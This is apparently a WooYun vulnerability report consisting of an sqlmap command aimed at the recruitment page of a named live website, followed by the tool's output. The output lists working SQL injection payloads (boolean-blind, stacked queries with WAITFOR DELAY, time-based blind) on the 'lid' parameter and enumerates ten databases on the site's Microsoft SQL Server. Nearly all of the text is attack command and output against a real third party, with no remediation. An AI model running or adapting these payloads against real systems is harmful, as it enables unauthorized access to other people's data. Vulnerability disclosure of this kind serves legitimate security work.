WooYun.org

root@hack[x:\sqlmap]# sqlmap.py -u "http://www.uc56.com:80/cn/job/recruitments" --data "keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-1&tid=" -p "lid" --level 2 --risk 2 --hex --threads 6 -v 3 --dbms "mssql" --dbs

---
Place: POST
Parameter: lid
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-9789' OR (9790=9790) AND 'WeDl'='WeDl&tid=
    Vector: OR ([INFERENCE])
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-1'; WAITFOR DELAY '0:0:5'--&tid=
    Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-1' WAITFOR DELAY '0:0:5'--&tid=
    Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
web server operating system: Windows
web application technology: ASP.NET 4.0.30319
back-end DBMS: Microsoft SQL Server 2008
available databases [10]:
[*] *
[*] 0x6d0061007300740
[*] \cOa
[*] model
[*] msdb
[*] SYSUNC
[*] tempdb
[*] ucbbs
[*] UcSoa
[*] ucweb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests: